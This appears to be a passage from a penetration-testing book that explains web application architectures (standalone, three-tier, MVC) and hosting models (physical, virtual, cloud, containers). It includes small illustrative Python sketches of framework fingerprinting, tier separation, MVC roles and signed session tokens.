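As a concrete illustration of characterizing such turnkey frameworks, the sketch below matches response headers and body content against a few well-known fingerprints. The signature strings reflect real conventions (for example, WordPress's wp-content paths and Drupal's X-Drupal-Cache header), but the lookup table, function names, and sample responses are hypothetical stand-ins, not any tool's actual API:

```python
# Illustrative sketch: inferring a turnkey framework from an HTTP response.
# The signature strings are well-known conventions; the table itself is a
# hypothetical, deliberately small example.

FRAMEWORK_SIGNATURES = {
    "wordpress": ["wp-content", "wp-includes"],          # asset path conventions
    "drupal":    ["x-drupal-cache", "x-generator: drupal"],  # header fingerprints
    "django":    ["csrftoken"],                           # default CSRF cookie name
}

def guess_framework(headers, body):
    """Return the frameworks whose fingerprints appear in the response.

    headers: dict of response header name -> value
    body:    response body as a string
    """
    haystack = "\n".join(f"{k.lower()}: {v.lower()}" for k, v in headers.items())
    haystack += "\n" + body.lower()
    return [name for name, sigs in FRAMEWORK_SIGNATURES.items()
            if any(sig in haystack for sig in sigs)]
```

In practice, tools such as whatweb or wappalyzer maintain far larger signature sets, but the principle is the same: a standalone framework install leaks its identity through headers, cookies, and asset paths.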

A simple single-tier or standalone architecture is shown here in the following figure:

The standalone architecture was the first encountered historically, and it is often the first step in any application's evolution.

Three-tier models

Conceptually, the three-tier design is still used as a reference model, even though most applications have either migrated to other topologies or have yet to evolve from a standalone implementation. While many applications now stray from this classic model, we still find it useful for understanding the basic facilities needed for real-world applications. We call it a three-tier model, but it also assumes a fourth, unnamed component: the client.

The three tiers include the web tier (or front end), the application tier, and the database tier, as seen in the following figure:

The Three-Tier Architecture provides the greater scalability and specialization that modern enterprise applications require.

The role of each tier is important to consider:

Web or Presentation Tier/Server/Front End: This module provides the User Interface (UI), authentication and authorization, scaling provisions to accommodate a large number of users, high availability features (to handle load shifting, content caching, and fault tolerance), and any software service that must be provisioned for the client or is used to communicate with the client. HTML, eXtensible Markup Language (XML), Asynchronous JavaScript And XML (AJAX), Cascading Style Sheets (CSS), JavaScript, Flash, other presented content, and UI components all reside in this tier, which is commonly hosted by Apache, IBM WebSphere, or Microsoft IIS. In effect, this tier is what the users see through their browser and interact with to request and receive their desired outcomes.

Application or Business Tier/Server: This is the engine of the web application. Requests fielded by the web tier are acted upon here, and this is where business logic, processes, or algorithms reside. This tier also acts as a bridge module to multiple databases or even other applications, either within the same organization or with trusted third parties. C/C++, Java, Ruby, and PHP are usually the languages used to do the heavy lifting and turn raw data from the database tier into the information that the web tier presents to the client.

The Database Tier/Server: Massive amounts of data of all forms are stored in specialized systems called databases. These troves of information are arranged so they can be quickly accessed yet continually scaled. Classic SQL implementations such as MySQL and PostgreSQL, as well as Redis, CouchDB, Oracle, and others, are common for storing the data, along with a large variety of abstraction tools helping to organize and access that data. At the higher end of data collection and processing, there is a growing number of superscalar database architectures that involve Not Only SQL (NoSQL) databases, coupled with abstraction software such as Hadoop. These are commonly found in anything that claims to be Big Data or Data Analytics, such as Facebook, Google, NASA, and so on.

The Client: All three tiers need an audience, and the client (more specifically, the browser) is where users access the application and interact with it. The browser and its plugin software modules support the web tier in presenting the information as intended by the application developers.
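The division of labor among the tiers can be sketched in miniature. The following Python stand-ins are purely illustrative (all names and the in-memory "database" are hypothetical); they show a single request flowing from the presentation tier, through business logic, down to storage and back:

```python
# Minimal, hypothetical sketch of the three-tier flow: a dict stands in for
# the database tier, one function for the application tier, and another for
# the web/presentation tier that renders HTML for the client.

DATABASE = {"user:42": {"name": "alice", "balance": 120.0}}  # database tier

def db_fetch(key):
    """Database tier: raw storage and retrieval, no business logic."""
    return DATABASE.get(key)

def get_account_summary(user_id):
    """Application tier: business logic turning raw data into information."""
    record = db_fetch(f"user:{user_id}")
    if record is None:
        return {"error": "unknown user"}
    return {"greeting": f"Hello, {record['name']}",
            "balance_display": f"${record['balance']:.2f}"}

def render_page(user_id):
    """Web/presentation tier: formats the result as HTML for the client."""
    summary = get_account_summary(user_id)
    body = "".join(f"<p>{value}</p>" for value in summary.values())
    return f"<html><body>{body}</body></html>"
```

From a tester's perspective, each hand-off in this chain (client to web tier, web tier to application tier, application tier to database) is a boundary where input validation and access control can fail.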

Vendors take this model and modify it to accentuate their strengths or more closely convey their strategies. Both Oracle's and Microsoft's reference web application architectures, for instance, combine the web and application tiers into a single tier, but Oracle calls attention to its strength on the database side, whereas Microsoft expends considerable effort expanding its list of complementary services that can add value for the customer (and revenue for Microsoft), including load balancing, authentication services, and ties to its own operating systems on a majority of clients worldwide.

Model-View-Controller design

The Model-View-Controller (MVC) design is a functional model that guides the separation of information and exposure and, to some degree, also addresses the privileges of stakeholder users through role separation. This keeps users and their inputs from intermingling with the back-end business processes, logic, and transactions that exposed earlier architectures to data leakage. The MVC design approach was actually created by thick-client application developers, and it is not a logical separation of services and components but rather a role-based separation. Now that web applications commonly have to scale while tracking and enforcing roles, web application developers have adapted it to their use. MVC designs also facilitate code reuse and parallel module development.

An MVC design can be seen in following figure:

The Model-View-Controller design focuses on roles, not functions, and is often combined with a functional architecture.

In the MVC design, the four components are as follows:

Model: The model maintains and updates data objects as the source of truth for the application, possessing the rules, logic, and patterns that make the application valuable. It has no knowledge of the user, but rather receives calls from the controller to process commands against its own data objects and returns its results to both the controller and the view. Another way to look at it is that the model determines the behavior of the application.

View: The view is responsible for presenting information to the user, and so it handles content delivery and responses, taking feedback from the controller and results from the model. It frames the interface that the user views and interacts with. The view is where the user sees the application work.

Controller: The controller acts as the central link between the view and the model; receiving input from the view's user interface, the controller translates these input calls into requests that the model acts on. These requests can update the model and act on the user's intent, or update the view presented to the user. The controller is what makes the application interactive, allowing the outside world to stimulate the model and alter the view.

User: As in the other models, the user is an inferred component of the design; and indeed, the entire design revolves around how to allow the application to deliver value to the customer.
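The three roles can be sketched in a few lines of Python. All class and method names here are hypothetical stand-ins meant to show the role-based separation, not any particular framework's API:

```python
# Hypothetical minimal MVC sketch: the model owns data and rules, the view
# only renders, and the controller mediates between user input and the model.

class Model:
    """Source of truth: owns the data objects and the rules for changing them."""
    def __init__(self):
        self.items = []

    def add_item(self, name):
        # Business rule lives in the model, not in the UI.
        if not name.strip():
            raise ValueError("item name must not be empty")
        self.items.append(name.strip())
        return self.items

class View:
    """Presents the model's state to the user; no business logic here."""
    def render(self, items):
        return "\n".join(f"- {item}" for item in items)

class Controller:
    """Translates user input into requests the model acts on."""
    def __init__(self, model, view):
        self.model, self.view = model, view

    def handle_add(self, user_input):
        items = self.model.add_item(user_input)
        return self.view.render(items)
```

Note that the user never touches the model directly; every input passes through the controller, which is exactly the separation that keeps user input away from back-end logic.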

Notice that in the MVC model, very little detail is given about software modules, and this is intentional. By focusing on roles and the separation of duties, software (and now, web) developers were free to create their own platforms and architectures while using MVC as a guide for role-based segmentation. Contrast this with how the standalone or three-tier models break down the operation of an application, and we'll see that they approach the same thing in very different ways.

One thing MVC does instill is a sense of statefulness, meaning that the application needs to track session information for continuity. This continuity drove the need for HTTP cookies and tokens to track sessions, which are themselves something our app developers must now find ways to secure. Heavy use of application programming interfaces (APIs) also means that there is now a larger attack surface. An application may present only a small portion of the data stored in the database tier, so the model should be populated selectively; maintaining too much information within the model invites leaks when it is misconfigured or breached. In such cases, MVC is often shunned as a methodology because it can be difficult to manage data exposure within it.
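One common way to harden the session tokens mentioned above is to sign them with a server-side secret so tampering is detectable. The sketch below uses Python's standard hmac and base64 modules; the token format and all names are illustrative assumptions, and real applications should rely on a vetted session library rather than rolling their own:

```python
# Hypothetical sketch of a signed session token. The secret stays on the
# server; a client that alters the token cannot recompute a valid signature.

import base64
import hashlib
import hmac

SECRET = b"server-side secret, never sent to the client"  # illustrative value

def issue_token(session_id):
    """Sign the session id and pack id + signature into one opaque token."""
    sig = hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(f"{session_id}:{sig}".encode()).decode()

def verify_token(token):
    """Return the session id if the signature checks out, else None."""
    try:
        session_id, sig = base64.urlsafe_b64decode(token).decode().rsplit(":", 1)
    except Exception:
        return None  # malformed token
    expected = hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()
    return session_id if hmac.compare_digest(sig, expected) else None
```

As testers, unsigned or weakly signed session tokens are exactly the kind of flaw we look for: if we can forge or replay a token, the statefulness MVC relies on becomes an attack vector.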

It should be noted that the MVC design approach can be combined with physical or logical models of functions; in fact, platforms that use some MVC design principles power the majority of today's web applications.

Web application hosting

The location of the application or its modules has a direct bearing on our role as penetration testers. Target applications may be anywhere on a continuum, from physical to virtual, to cloud-hosted components, or some combination of the three. Recently, a fourth possibility has arrived: containers. The continuum of hosting options and their relative scale and security attributes are shown in the following figure. Bear in mind that the dates shown here relate to the rise in popularity of each possibility, but that any of the hosting possibilities may coexist, and that containers, in fact, can be hosted just as well in either cloud or on-premise data centers.

This evolution is seen in the following figure:

Hosting options have evolved to better enable flexible and dynamic deployment - most customers deploy in multiple places.

Physical hosting

For many years, application architectures and design choices only had to consider the physical, bare-metal hosts running the various components of the architecture. As web applications scaled and incorporated specialized platforms, additional hosts were added to meet the need: new database servers as the data sets became more diverse, additional application servers to incorporate additional software platforms, and so on. Labor and hardware resources were dedicated to each additional instance, adding cost, complexity, and waste to the data center. The workloads depended on dedicated resources, and this made them both vulnerable and inflexible.

Virtual hosting

Virtualization has drastically changed this paradigm. By allowing hardware resources to be pooled and allocated logically to multiple guest systems, a single homogeneous pool of servers could host all of the disparate operating systems, applications, database types, and other application necessities, with centralized management and with interfaces and devices dynamically allocated to multiple organizations in a prioritized manner. Web applications in particular benefited from this: the flexibility of virtualization offered a means to create parallel application environments, clones of databases, and so on, for testing, quality assurance, and surge capacity. Because system administrators could now manage multiple workloads on the same pool of resources, hardware and support costs (for example, power, floor space, installation, and provisioning) could also be reduced, assuming the licensing costs don't neutralize the inherent efficiencies. Many applications still run in virtual on-premises environments.

It's worth noting that virtualization has also introduced a new tension among application, system administration, and network teams, as responsibilities for security-related aspects have shifted. Such duties may not be clearly understood, properly fulfilled, or even accounted for. Sounds like a great pen testing opportunity!

Cloud hosting

Amazon took the concept of hosting virtual workloads a step further in 2006 and introduced cloud computing, with Microsoft Azure and others following shortly thereafter. The promise of turnkey Software as a Service (SaaS) running in highly survivable infrastructures via the internet allowed companies to build out applications without investing in hardware, bandwidth, or even real estate. Cloud computing was supposed to replace the private cloud (traditional on-premises systems), and some organizations have indeed made this happen. The predominant trend, however, is for enterprises to split their applications between private and public clouds, based on the types of services involved and their steady-state demand.

Containers – a new trend

Containers offer a parallel or alternative packaging: rather than including the entire operating system and emulated hardware common to virtual machines, containers bring only their unique attributes and share the host's kernel and common services, making them smaller and more agile. These traits have allowed large companies such as Google and Facebook to scale in real time to the surge needs of their users with microsecond response times, and to completely automate both the spawning and the destruction of container workloads.

So, what does all of this mean to us? The location and packaging of a web application impacts its security posture. Both private and public cloud-hosted applications will normally integrate with other applications that may span both domains. These integration points offer potential threat vectors that must be tested, or they will certainly fall victim to attack. Cloud-hosted applications may benefit from protections hosted or offered by the service provider, but providers may also limit the variety of defensive options and web platforms that can be supported. Understanding these constraints can help us focus our probing and eliminate unnecessary work. The hosting paradigm also determines the composition of the team of defenders and operators that we encounter. Cloud hosting companies may have more capable security operations centers, but a division of application security responsibility can fragment their intelligence and provide a gap that can be used to exploit the target. The underlying virtualization and operating systems available will also influence the choice of the application's platform, the surrounding security mechanisms, and so on.